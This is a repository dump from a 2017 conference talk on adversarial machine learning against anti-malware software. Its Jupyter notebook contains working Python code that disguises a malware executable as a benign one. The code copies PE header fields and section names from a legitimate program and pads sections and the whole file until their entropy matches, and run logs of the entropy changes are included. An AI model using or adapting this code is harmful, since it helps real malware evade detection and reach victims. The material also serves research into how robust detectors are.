├── Adversarial Machine Learning for AV software.pdf ├── README.md ├── adversarial_model_for_av.ipynb └── extract.py /Adversarial Machine Learning for AV software.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nababora/advML/2cbc3351a2b1579a1465655df52c41369182bd50/Adversarial Machine Learning for AV software.pdf -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Adversarial Machine Learning for Anti-Malware Software 2 | 3 | presented in Secuinside 2017 @nababora 4 | 5 | Introduce practical guidances for developing adversarial machine model for anti-malware software. 6 | I didn't use reinforcement model yet, just proof-of-concept. 7 | 8 | 9 | -------------------------------------------------------------------------------- /adversarial_model_for_av.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 13, 6 | "metadata": { 7 | "collapsed": true 8 | }, 9 | "outputs": [], 10 | "source": [ 11 | "import csv, os, pefile\n", 12 | "import math\n", 13 | "import array\n", 14 | "import random\n", 15 | "import pandas as pd\n", 16 | "\n", 17 | "import extract\n", 18 | "\n", 19 | "class Make_good():\n", 20 | "\n", 21 | " def __init__(self,benign,malware):\n", 22 | "\n", 23 | " header = ['e_cblp','e_cp','e_cparhdr','e_maxalloc','e_sp','e_lfanew',\\\n", 24 | " 'NumofSections','CreationYear','FH3_local_sym','FH4_ws_trim','FH11_file_system','FH13_up_system',\\\n", 25 | " 'Majorlinker','Minorlinker','SizeCode','InitialSize','UninitialSize','EntryPoint','BaseCode','BaseData',\\\n", 26 | " 'MajorOS','MinorOS','MajorImage','MinorImage','MajorSub','MinorSub','Checksum','Subsystem',\\\n", 27 | " 'SReserve','SCommit','HReserve','HCommit','LoaderFlags','DLL3','DLL4','DLL6'] 
#,'sus_sec','e_file','non_sus_sec','packer','e_text','e_data','filesize']\n", 28 | "\n", 29 | " self.benign_path = benign\n", 30 | " self.malware_path = malware \n", 31 | " self.total_list = pd.DataFrame(columns=header)\n", 32 | "\n", 33 | " def print_data(self, pe, clas):\n", 34 | "\n", 35 | " if clas == 1:\n", 36 | " msg = \"Malware\"\n", 37 | " else:\n", 38 | " msg = \"Benign\"\n", 39 | "\n", 40 | " dat = self.get_dos_data(pe) + self.get_file_data(pe) + self.get_optional_data(pe)\n", 41 | " self.total_list.loc[len(self.total_list)] = dat\n", 42 | "\n", 43 | " \n", 44 | " def get_dos_data(self, pe):\n", 45 | "\n", 46 | " dos_data = [pe.DOS_HEADER.e_cblp, pe.DOS_HEADER.e_cp, pe.DOS_HEADER.e_cparhdr, pe.DOS_HEADER.e_maxalloc, pe.DOS_HEADER.e_sp, pe.DOS_HEADER.e_lfanew]\n", 47 | " self.total_list.append(dos_data)\n", 48 | " \n", 49 | " return dos_data\n", 50 | "\n", 51 | " def get_file_data(self, pe):\n", 52 | "\n", 53 | " seconds= pe.FILE_HEADER.TimeDateStamp\n", 54 | " creation_year = 1970 + ((int(seconds) / 86400) / 365)\n", 55 | " \n", 56 | " tmp = [pe.FILE_HEADER.IMAGE_FILE_RELOCS_STRIPPED,\\\n", 57 | " pe.FILE_HEADER.IMAGE_FILE_EXECUTABLE_IMAGE,\\\n", 58 | " pe.FILE_HEADER.IMAGE_FILE_LINE_NUMS_STRIPPED,\\\n", 59 | " pe.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED,\\\n", 60 | " pe.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM,\\\n", 61 | " pe.FILE_HEADER.IMAGE_FILE_LARGE_ADDRESS_AWARE,\\\n", 62 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_LO,\\\n", 63 | " pe.FILE_HEADER.IMAGE_FILE_32BIT_MACHINE,\\\n", 64 | " pe.FILE_HEADER.IMAGE_FILE_DEBUG_STRIPPED,\\\n", 65 | " pe.FILE_HEADER.IMAGE_FILE_REMOVABLE_RUN_FROM_SWAP,\\\n", 66 | " pe.FILE_HEADER.IMAGE_FILE_NET_RUN_FROM_SWAP,\\\n", 67 | " pe.FILE_HEADER.IMAGE_FILE_SYSTEM,\\\n", 68 | " pe.FILE_HEADER.IMAGE_FILE_DLL,\\\n", 69 | " pe.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY,\\\n", 70 | " pe.FILE_HEADER.IMAGE_FILE_BYTES_REVERSED_HI\n", 71 | " ]\n", 72 | " \n", 73 | " \n", 74 | " file_data = [pe.FILE_HEADER.NumberOfSections, 
creation_year, int(tmp[3]), int(tmp[4]), int(tmp[11]), int(tmp[13])]\n", 75 | " \n", 76 | " return file_data\n", 77 | "\n", 78 | " def get_optional_data(self, pe):\n", 79 | "\n", 80 | " tmp = [\n", 81 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE,\\\n", 82 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY,\\\n", 83 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NX_COMPAT ,\\\n", 84 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION,\\\n", 85 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH,\\\n", 86 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND,\\\n", 87 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER,\\\n", 88 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE,\\\n", 89 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA,\\\n", 90 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_APPCONTAINER,\\\n", 91 | " pe.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_GUARD_CF\n", 92 | " ]\n", 93 | " \n", 94 | " try:\n", 95 | " optional_data = [\n", 96 | " pe.OPTIONAL_HEADER.MajorLinkerVersion,\\\n", 97 | " pe.OPTIONAL_HEADER.MinorLinkerVersion,\\\n", 98 | " pe.OPTIONAL_HEADER.SizeOfCode,\\\n", 99 | " pe.OPTIONAL_HEADER.SizeOfInitializedData,\\\n", 100 | " pe.OPTIONAL_HEADER.SizeOfUninitializedData,\\\n", 101 | " pe.OPTIONAL_HEADER.AddressOfEntryPoint,\\\n", 102 | " pe.OPTIONAL_HEADER.BaseOfCode,\\\n", 103 | " pe.OPTIONAL_HEADER.BaseOfData,\\\n", 104 | " pe.OPTIONAL_HEADER.MajorOperatingSystemVersion,\\\n", 105 | " pe.OPTIONAL_HEADER.MinorOperatingSystemVersion,\\\n", 106 | " pe.OPTIONAL_HEADER.MajorImageVersion,\\\n", 107 | " pe.OPTIONAL_HEADER.MinorImageVersion,\\\n", 108 | " pe.OPTIONAL_HEADER.MajorSubsystemVersion,\\\n", 109 | " pe.OPTIONAL_HEADER.MinorSubsystemVersion,\\\n", 110 | " pe.OPTIONAL_HEADER.CheckSum,\\\n", 111 | " pe.OPTIONAL_HEADER.Subsystem,\n", 112 | " pe.OPTIONAL_HEADER.SizeOfStackReserve,\\\n", 113 | " pe.OPTIONAL_HEADER.SizeOfStackCommit,\\\n", 114 | " 
pe.OPTIONAL_HEADER.SizeOfHeapReserve,\\\n", 115 | " pe.OPTIONAL_HEADER.SizeOfHeapCommit,\\\n", 116 | " int(pe.OPTIONAL_HEADER.LoaderFlags == 0),\\\n", 117 | " int(tmp[3]), int(tmp[4]), int(tmp[6])]\n", 118 | "\n", 119 | " except Exception, e:\n", 120 | " print e \n", 121 | " \n", 122 | " return optional_data \n", 123 | "\n", 124 | " \n", 125 | " def write_dos_header(self, pe_b, pe_m):\n", 126 | " # total : 4\n", 127 | " pe_m.DOS_HEADER.e_cblp = pe_b.DOS_HEADER.e_cblp\n", 128 | " pe_m.DOS_HEADER.e_cparhdr = pe_b.DOS_HEADER.e_cparhdr\n", 129 | " pe_m.DOS_HEADER.e_maxalloc = pe_b.DOS_HEADER.e_maxalloc\n", 130 | " pe_m.DOS_HEADER.e_sp = pe_b.DOS_HEADER.e_sp\n", 131 | " \n", 132 | " def write_file_header(self, pe_b, pe_m): \n", 133 | " # total : 5\n", 134 | " pe_m.FILE_HEADER.TimeDateStamp = pe_b.FILE_HEADER.TimeDateStamp\n", 135 | " pe_m.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED = pe_b.FILE_HEADER.IMAGE_FILE_LOCAL_SYMS_STRIPPED\n", 136 | " pe_m.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM = pe_b.FILE_HEADER.IMAGE_FILE_AGGRESIVE_WS_TRIM\n", 137 | " pe_m.FILE_HEADER.IMAGE_FILE_SYSTEM = pe_b.FILE_HEADER.IMAGE_FILE_SYSTEM \n", 138 | " pe_m.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY = pe_b.FILE_HEADER.IMAGE_FILE_UP_SYSTEM_ONLY \n", 139 | " \n", 140 | "\n", 141 | " def write_optional_header(self, pe_b, pe_m):\n", 142 | " # total : 24\n", 143 | " pe_m.OPTIONAL_HEADER.MajorLinkerVersion = pe_b.OPTIONAL_HEADER.MajorLinkerVersion \n", 144 | " pe_m.OPTIONAL_HEADER.MinorLinkerVersion = pe_b.OPTIONAL_HEADER.MinorLinkerVersion\n", 145 | " pe_m.OPTIONAL_HEADER.SizeOfCode = pe_b.OPTIONAL_HEADER.SizeOfCode \n", 146 | " pe_m.OPTIONAL_HEADER.SizeOfInitializedData = pe_b.OPTIONAL_HEADER.SizeOfInitializedData\n", 147 | " pe_m.OPTIONAL_HEADER.SizeOfUninitializedData = pe_b.OPTIONAL_HEADER.SizeOfUninitializedData \n", 148 | " pe_m.OPTIONAL_HEADER.BaseOfCode = pe_b.OPTIONAL_HEADER.BaseOfCode \n", 149 | " pe_m.OPTIONAL_HEADER.BaseOfData = pe_b.OPTIONAL_HEADER.BaseOfData\n", 150 | " 
pe_m.OPTIONAL_HEADER.MajorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MajorOperatingSystemVersion\n", 151 | " pe_m.OPTIONAL_HEADER.MinorOperatingSystemVersion = pe_b.OPTIONAL_HEADER.MinorOperatingSystemVersion\n", 152 | " pe_m.OPTIONAL_HEADER.MajorImageVersion = pe_b.OPTIONAL_HEADER.MajorImageVersion\n", 153 | " pe_m.OPTIONAL_HEADER.MinorImageVersion = pe_b.OPTIONAL_HEADER.MinorImageVersion\n", 154 | " pe_m.OPTIONAL_HEADER.MajorSubsystemVersion = pe_b.OPTIONAL_HEADER.MajorSubsystemVersion\n", 155 | " pe_m.OPTIONAL_HEADER.MinorSubsystemVersion = pe_b.OPTIONAL_HEADER.MinorSubsystemVersion\n", 156 | " pe_m.OPTIONAL_HEADER.CheckSum = pe_b.OPTIONAL_HEADER.CheckSum\n", 157 | " pe_m.OPTIONAL_HEADER.Subsystem = pe_b.OPTIONAL_HEADER.Subsystem\n", 158 | " pe_m.OPTIONAL_HEADER.SizeOfStackReserve = pe_b.OPTIONAL_HEADER.SizeOfStackReserve\n", 159 | " pe_m.OPTIONAL_HEADER.SizeOfStackCommit = pe_b.OPTIONAL_HEADER.SizeOfStackCommit\n", 160 | " pe_m.OPTIONAL_HEADER.SizeOfHeapReserve = pe_b.OPTIONAL_HEADER.SizeOfHeapReserve\n", 161 | " pe_m.OPTIONAL_HEADER.SizeOfHeapCommit = pe_b.OPTIONAL_HEADER.SizeOfHeapCommit\n", 162 | " pe_m.OPTIONAL_HEADER.LoaderFlags = pe_b.OPTIONAL_HEADER.LoaderFlags\n", 163 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_ISOLATION\n", 164 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_SEH\n", 165 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_NO_BIND\n", 166 | " pe_m.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = pe_b.OPTIONAL_HEADER.IMAGE_DLLCHARACTERISTICS_WDM_DRIVER\n", 167 | " \n", 168 | " \n", 169 | " def write_extra_info(self, pe_b, pe_m):\n", 170 | " # total : 2\n", 171 | " benign_sections = ['.text', '.rdata','.data','.idata','.edata','.rsrc','.bss','.crt','.tls']\n", 172 | " \n", 173 | " NumSection = pe_m.FILE_HEADER.NumberOfSections\n", 174 | " for i in 
range(0, NumSection):\n", 175 | " pe_m.sections[i].Name = benign_sections[i].encode()\n", 176 | " \n", 177 | " \n", 178 | " def get_start(self, mode):\n", 179 | "\n", 180 | " # get benign pe file with pefile \n", 181 | " try:\n", 182 | " pe_benign = pefile.PE(self.benign_path)\n", 183 | " except Exception, e:\n", 184 | " print \"{} while opening {}\".format(e,self.benign_path)\n", 185 | "\n", 186 | " # get malware pe file with pefile \n", 187 | " try:\n", 188 | " pe_malware = pefile.PE(self.malware_path)\n", 189 | " except Exception, e:\n", 190 | " print \"{} while opening {}\".format(e,self.malware_path)\n", 191 | "\n", 192 | " self.print_data(pe_benign, 0)\n", 193 | " self.print_data(pe_malware, 1)\n", 194 | " \n", 195 | " if mode == 1:\n", 196 | " self.write_dos_header(pe_benign, pe_malware)\n", 197 | " self.write_file_header(pe_benign, pe_malware)\n", 198 | " self.write_optional_header(pe_benign, pe_malware)\n", 199 | " self.write_extra_info(pe_benign, pe_malware)\n", 200 | "\n", 201 | " new_exe_path = \"malware_.exe\"\n", 202 | " pe_malware.write(new_exe_path)\n", 203 | " new_pe = pefile.PE(new_exe_path)\n", 204 | " \n", 205 | " return self.total_list\n", 206 | "\n", 207 | "\n", 208 | " " 209 | ] 210 | }, 211 | { 212 | "cell_type": "code", 213 | "execution_count": 2, 214 | "metadata": { 215 | "collapsed": true 216 | }, 217 | "outputs": [], 218 | "source": [ 219 | "def cal_byteFrequency(byteArr,fileSize):\n", 220 | " freqList = []\n", 221 | " for b in range(256):\n", 222 | " ctr = 0\n", 223 | " for byte in byteArr:\n", 224 | " if byte == b:\n", 225 | " ctr += 1\n", 226 | " freqList.append(float(ctr) / fileSize)\n", 227 | " return freqList\n", 228 | "\n", 229 | "def get_file_entropy(byteArr, fileSize):\n", 230 | " freqList = cal_byteFrequency(byteArr,fileSize)\n", 231 | " # Shannon entropy\n", 232 | " ent = 0.0\n", 233 | " for freq in freqList:\n", 234 | " if freq > 0:\n", 235 | " ent += - freq * math.log(freq, 2)\n", 236 | " return [fileSize,ent]\n", 237 | 
"\n", 238 | "def get_text_data_entropy(pe):\n", 239 | " result=[0.0, 0.0]\n", 240 | " \n", 241 | " for section in pe.sections:\n", 242 | " s_name = section.Name.split('\\x00')[0]\n", 243 | " if s_name == \".text\":\n", 244 | " result[0]= section.get_entropy()\n", 245 | " elif s_name == \".data\":\n", 246 | " result[1]= section.get_entropy()\n", 247 | " else:\n", 248 | " pass\n", 249 | " return result \n", 250 | "\n", 251 | "def get_file_bytes_size(filepath):\n", 252 | " f = open(filepath, \"rb\")\n", 253 | " byteArr = map(ord, f.read())\n", 254 | " f.close()\n", 255 | " fileSize = len(byteArr)\n", 256 | " return byteArr,fileSize\n" 257 | ] 258 | }, 259 | { 260 | "cell_type": "code", 261 | "execution_count": 3, 262 | "metadata": { 263 | "collapsed": true 264 | }, 265 | "outputs": [], 266 | "source": [ 267 | "def write_text_entropy(ben, mal, loo):\n", 268 | " \n", 269 | " ben_pe = pefile.PE(ben)\n", 270 | " mal_pe = pefile.PE(mal)\n", 271 | " \n", 272 | " ben_en = get_text_data_entropy(ben_pe)\n", 273 | " mal_en = get_text_data_entropy(mal_pe)\n", 274 | " \n", 275 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[0], \" mal: \", mal_en[0]\n", 276 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 277 | " \n", 278 | " insert_mul = loo\n", 279 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 280 | "\n", 281 | " for section in mal_pe.sections:\n", 282 | "\n", 283 | " s_name = section.Name.split('\\x00')[0]\n", 284 | " if s_name == \".text\":\n", 285 | " start = section.PointerToRawData + section.SizeOfRawData\n", 286 | " section.SizeOfRawData += text_padding\n", 287 | " end = section.PointerToRawData + section.SizeOfRawData\n", 288 | " else:\n", 289 | " section.PointerToRawData += text_padding\n", 290 | "\n", 291 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 292 | "\n", 
293 | " mal_pe.write(after_t)\n", 294 | " mal_pe.__data__.close()\n", 295 | " bytearr, _ = get_file_bytes_size(after_t)\n", 296 | " \n", 297 | " if ben_en[0] > mal_en[0]:\n", 298 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 299 | " else:\n", 300 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 301 | "\n", 302 | " #print l, ar\n", 303 | " #print len(bytearr), bytearr[start:end]\n", 304 | "\n", 305 | " byte = array.array('B', bytearr).tostring()\n", 306 | " f = open(after_t, 'wb')\n", 307 | " f.write(byte)\n", 308 | " f.close()\n", 309 | "\n", 310 | " new_pe = pefile.PE(after_t)\n", 311 | " new_en = get_text_data_entropy(new_pe)\n", 312 | " bytearr, _ = get_file_bytes_size(after_t)\n", 313 | " #print bytearr[start:end], len(bytearr[start:end])\n", 314 | "\n", 315 | " diff = abs(new_en[0] - ben_en[0])\n", 316 | " print \"* text section entropy :\", mal_en[0], \"->\", new_en[0], \" diff: \", diff\n", 317 | "\n", 318 | " return diff, new_en[0]\n" 319 | ] 320 | }, 321 | { 322 | "cell_type": "code", 323 | "execution_count": 4, 324 | "metadata": { 325 | "collapsed": true 326 | }, 327 | "outputs": [], 328 | "source": [ 329 | "def write_data_entropy(ben, mal, loo):\n", 330 | " \n", 331 | " ben_pe = pefile.PE(ben)\n", 332 | " mal_pe = pefile.PE(mal)\n", 333 | " \n", 334 | " ben_en = get_text_data_entropy(ben_pe)\n", 335 | " mal_en = get_text_data_entropy(mal_pe)\n", 336 | " \n", 337 | " #print \"[ entropy before ]\", \"\\n ben: \", ben_en[1], \" mal: \", mal_en[1]\n", 338 | " #print \"align: \", hex(mal_pe.OPTIONAL_HEADER.SectionAlignment), \" \", hex(mal_pe.OPTIONAL_HEADER.FileAlignment)\n", 339 | " \n", 340 | " insert_mul = loo\n", 341 | " text_padding = mal_pe.OPTIONAL_HEADER.FileAlignment*insert_mul\n", 342 | "\n", 343 | " for section in mal_pe.sections:\n", 344 | "\n", 345 | " s_name = section.Name.split('\\x00')[0]\n", 346 | " if s_name == \".data\":\n", 347 | " start = 
section.PointerToRawData + section.SizeOfRawData\n", 348 | " section.SizeOfRawData += text_padding\n", 349 | " end = section.PointerToRawData + section.SizeOfRawData\n", 350 | " elif s_name != \".text\" and s_name != \".data\":\n", 351 | " section.PointerToRawData += text_padding\n", 352 | "\n", 353 | " #print section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), hex(section.PointerToRawData), hex(section.SizeOfRawData)\n", 354 | "\n", 355 | " mal_pe.write(after_d)\n", 356 | " mal_pe.__data__.close()\n", 357 | " bytearr, _ = get_file_bytes_size(after_d)\n", 358 | " if ben_en[1] > mal_en[1]:\n", 359 | " bytearr[start:text_padding] = [random.sample(range(255), 1)[0] for i in range(0, text_padding)]\n", 360 | " else:\n", 361 | " bytearr[start:text_padding] = [0 for i in range(0, text_padding)]\n", 362 | "\n", 363 | " #print l, ar\n", 364 | " #print len(bytearr), bytearr[start:end]\n", 365 | "\n", 366 | " byte = array.array('B', bytearr).tostring()\n", 367 | " f = open(after_d, 'wb')\n", 368 | " f.write(byte)\n", 369 | " f.close()\n", 370 | "\n", 371 | " new_pe = pefile.PE(after_d)\n", 372 | " new_en = get_text_data_entropy(new_pe)\n", 373 | " bytearr, _ = get_file_bytes_size(after_d)\n", 374 | " #print bytearr[start:end], len(bytearr[start:end])\n", 375 | "\n", 376 | " diff = abs(new_en[1] - ben_en[1])\n", 377 | " print \"* data section entropy :\", mal_en[1], \"->\", new_en[1], \" diff: \", diff\n", 378 | "\n", 379 | " return diff, new_en[1]\n", 380 | "\n" 381 | ] 382 | }, 383 | { 384 | "cell_type": "code", 385 | "execution_count": 5, 386 | "metadata": { 387 | "collapsed": true 388 | }, 389 | "outputs": [], 390 | "source": [ 391 | "def write_file_entropy(ben, mal):\n", 392 | " \n", 393 | " save = 0\n", 394 | " rns = 0\n", 395 | " \n", 396 | " ben_byte, ben_size = get_file_bytes_size(ben)\n", 397 | " mal_byte, mal_size = get_file_bytes_size(mal)\n", 398 | "\n", 399 | " _, ben_en = get_file_entropy(ben_byte, ben_size)\n", 400 | " _, mal_en = 
get_file_entropy(mal_byte, mal_size)\n", 401 | " \n", 402 | " \n", 403 | " diff_bak = 10.0\n", 404 | " \n", 405 | " print \"File entropy before: \", ben_en, \" \", mal_en, \" diff_bak: \", diff_bak \n", 406 | " \n", 407 | " \n", 408 | " for di in range(1, 100):\n", 409 | " \n", 410 | " if save:\n", 411 | " di = di -1\n", 412 | " \n", 413 | " bytearr = mal_byte\n", 414 | " append_size = 4096*di\n", 415 | " \n", 416 | " if ben_en < mal_en:\n", 417 | " appen = [0 for i in xrange(append_size)]\n", 418 | " bytearr.extend(appen)\n", 419 | " else:\n", 420 | " appen = [random.sample(range(255), 1)[0] for i in xrange(append_size)]\n", 421 | " bytearr.extend(appen)\n", 422 | "\n", 423 | " size, ent = get_file_entropy(bytearr, (mal_size + append_size))\n", 424 | " diff = abs(ben_en - ent)\n", 425 | " print \"entropy after :\", mal_en, \" -> \", ent, \" diff: \", diff\n", 426 | "\n", 427 | " if diff_bak < diff:\n", 428 | " save = 1\n", 429 | "\n", 430 | " else:\n", 431 | " diff_bak = diff\n", 432 | " \n", 433 | " if save:\n", 434 | " rns = ent\n", 435 | " byte = array.array('B', bytearr).tostring()\n", 436 | " f = open(final, 'wb')\n", 437 | " f.write(byte)\n", 438 | " f.close()\n", 439 | " break\n", 440 | " \n", 441 | " return rns\n" 442 | ] 443 | }, 444 | { 445 | "cell_type": "code", 446 | "execution_count": 14, 447 | "metadata": {}, 448 | "outputs": [ 449 | { 450 | "name": "stdout", 451 | "output_type": "stream", 452 | "text": [ 453 | "[*] Before Crafting Malware Sample \n" 454 | ] 455 | }, 456 | { 457 | "data": { 458 | "text/html": [ 459 | "
\n", 460 | "\n", 473 | "\n", 474 | " \n", 475 | " \n", 476 | " \n", 477 | " \n", 478 | " \n", 479 | " \n", 480 | " \n", 481 | " \n", 482 | " \n", 483 | " \n", 484 | " \n", 485 | " \n", 486 | " \n", 487 | " \n", 488 | " \n", 489 | " \n", 490 | " \n", 491 | " \n", 492 | " \n", 493 | " \n", 494 | " \n", 495 | " \n", 496 | " \n", 497 | " \n", 498 | " \n", 499 | " \n", 500 | " \n", 501 | " \n", 502 | " \n", 503 | " \n", 504 | " \n", 505 | " \n", 506 | " \n", 507 | " \n", 508 | " \n", 509 | " \n", 510 | " \n", 511 | " \n", 512 | " \n", 513 | " \n", 514 | " \n", 515 | " \n", 516 | " \n", 517 | " \n", 518 | " \n", 519 | " \n", 520 | " \n", 521 | " \n", 522 | " \n", 523 | " \n", 524 | " \n", 525 | " \n", 526 | " \n", 527 | " \n", 528 | " \n", 529 | " \n", 530 | " \n", 531 | " \n", 532 | " \n", 533 | " \n", 534 | " \n", 535 | " \n", 536 | " \n", 537 | " \n", 538 | " \n", 539 | " \n", 540 | " \n", 541 | " \n", 542 | " \n", 543 | " \n", 544 | " \n", 545 | " \n", 546 | " \n", 547 | " \n", 548 | " \n", 549 | " \n", 550 | "
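|   | e_cblp | e_cp | e_cparhdr | e_maxalloc | e_sp | e_lfanew | NumofSections | CreationYear | FH3_local_sym | FH4_ws_trim | ... | Checksum | Subsystem | SReserve | SCommit | HReserve | HCommit | LoaderFlags | DLL3 | DLL4 | DLL6 |
| 0 | 144 | 3 | 4 | 65535 | 184 | 280 | 5 | 2017 | 0 | 0 | ... | 2727685 | 2 | 1048576 | 4096 | 1048576 | 4096 | 1 | 0 | 0 | 0 |
| 1 | 80 | 2 | 4 | 65535 | 184 | 256 | 8 | 1992 | 1 | 0 | ... | 684332 | 2 | 1048576 | 16384 | 1048576 | 4096 | 1 | 0 | 0 | 0 |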
\n", 551 | "

2 rows × 36 columns

\n", 552 | "
" 553 | ], 554 | "text/plain": [ 555 | " e_cblp e_cp e_cparhdr e_maxalloc e_sp e_lfanew NumofSections CreationYear \\\n", 556 | "0 144 3 4 65535 184 280 5 2017 \n", 557 | "1 80 2 4 65535 184 256 8 1992 \n", 558 | "\n", 559 | " FH3_local_sym FH4_ws_trim ... Checksum Subsystem SReserve SCommit HReserve \\\n", 560 | "0 0 0 ... 2727685 2 1048576 4096 1048576 \n", 561 | "1 1 0 ... 684332 2 1048576 16384 1048576 \n", 562 | "\n", 563 | " HCommit LoaderFlags DLL3 DLL4 DLL6 \n", 564 | "0 4096 1 0 0 0 \n", 565 | "1 4096 1 0 0 0 \n", 566 | "\n", 567 | "[2 rows x 36 columns]" 568 | ] 569 | }, 570 | "execution_count": 14, 571 | "metadata": {}, 572 | "output_type": "execute_result" 573 | } 574 | ], 575 | "source": [ 576 | "ben = 'procexp.exe'\n", 577 | "mal = 'malware.exe'\n", 578 | "\n", 579 | "pe = Make_good(ben, mal)\n", 580 | "pd = pe.get_start(1)\n", 581 | "\n", 582 | "print \"[*] Before Crafting Malware Sample \"\n", 583 | "pd\n" 584 | ] 585 | }, 586 | { 587 | "cell_type": "code", 588 | "execution_count": null, 589 | "metadata": {}, 590 | "outputs": [ 591 | { 592 | "name": "stdout", 593 | "output_type": "stream", 594 | "text": [ 595 | "* text section entropy : 6.91707825321 -> 6.86794673205 diff: 0.390924178805\n", 596 | "* text section entropy : 6.91707825321 -> 6.81787533455 diff: 0.340852781302\n", 597 | "* text section entropy : 6.91707825321 -> 6.76718649884 diff: 0.290163945591\n", 598 | "* text section entropy : 6.91707825321 -> 6.71612682881 diff: 0.239104275563\n", 599 | "* text section entropy : 6.91707825321 -> 6.66488842358 diff: 0.187865870337\n", 600 | "* text section entropy : 6.91707825321 -> 6.61362299274 diff: 0.13660043949\n", 601 | "* text section entropy : 6.91707825321 -> 6.56245157824 diff: 0.0854290249906\n", 602 | "* text section entropy : 6.91707825321 -> 6.51147147146 diff: 0.0344489182086\n", 603 | "* text section entropy : 6.91707825321 -> 6.4607612684 diff: 0.0162612848483\n", 604 | "* text section entropy : 6.91707825321 -> 6.91707825321 
diff: 0.440055699968\n", 605 | "* Final Text Section Entropy : 6.91707825321\n", 606 | "* data section entropy : 0.0 -> 7.54211511009 diff: 4.84998295094\n", 607 | "* data section entropy : 0.0 -> 7.79379731287 diff: 5.10166515371\n", 608 | "* data section entropy : 0.0 -> 7.60547841331 diff: 4.91334625416\n", 609 | "* Final Data Section Entropy : 7.60547841331\n" 610 | ] 611 | } 612 | ], 613 | "source": [ 614 | "mal = 'malware_.exe'\n", 615 | "after_t = 'mal_t.exe'\n", 616 | "after_d = 'mal_d.exe'\n", 617 | "final = 'mal_new.exe'\n", 618 | "\n", 619 | "count = 0\n", 620 | "diff_bak = 10\n", 621 | "\n", 622 | "for i in range(1, 10):\n", 623 | " diff, e = write_text_entropy(ben, mal, i) \n", 624 | " if diff_bak > diff:\n", 625 | " diff_bak = diff\n", 626 | " else:\n", 627 | " count = i-1\n", 628 | " break\n", 629 | "\n", 630 | "diff, e =write_text_entropy(ben, mal, count)\n", 631 | "\n", 632 | "print \"* Final Text Section Entropy : \", e\n", 633 | "\n", 634 | "count = 0\n", 635 | "diff_bak = 10\n", 636 | "\n", 637 | "for i in range(1, 30):\n", 638 | " diff, f = write_data_entropy(ben, after_t, i) \n", 639 | " if diff_bak > diff:\n", 640 | " diff_bak = diff\n", 641 | " else:\n", 642 | " count = i-1\n", 643 | " diff, f = write_data_entropy(ben, after_t, count)\n", 644 | " break\n", 645 | "\n", 646 | "print \"* Final Data Section Entropy : \", f\n", 647 | "\n", 648 | "\n", 649 | "ent = write_file_entropy(ben, after_d) \n", 650 | "print \"* Final File Entropy : \", ent\n" 651 | ] 652 | } 653 | ], 654 | "metadata": { 655 | "kernelspec": { 656 | "display_name": "Python 2", 657 | "language": "python", 658 | "name": "python2" 659 | }, 660 | "language_info": { 661 | "codemirror_mode": { 662 | "name": "ipython", 663 | "version": 2 664 | }, 665 | "file_extension": ".py", 666 | "mimetype": "text/x-python", 667 | "name": "python", 668 | "nbconvert_exporter": "python", 669 | "pygments_lexer": "ipython2", 670 | "version": "2.7.13" 671 | } 672 | }, 673 | "nbformat": 4, 674 | 
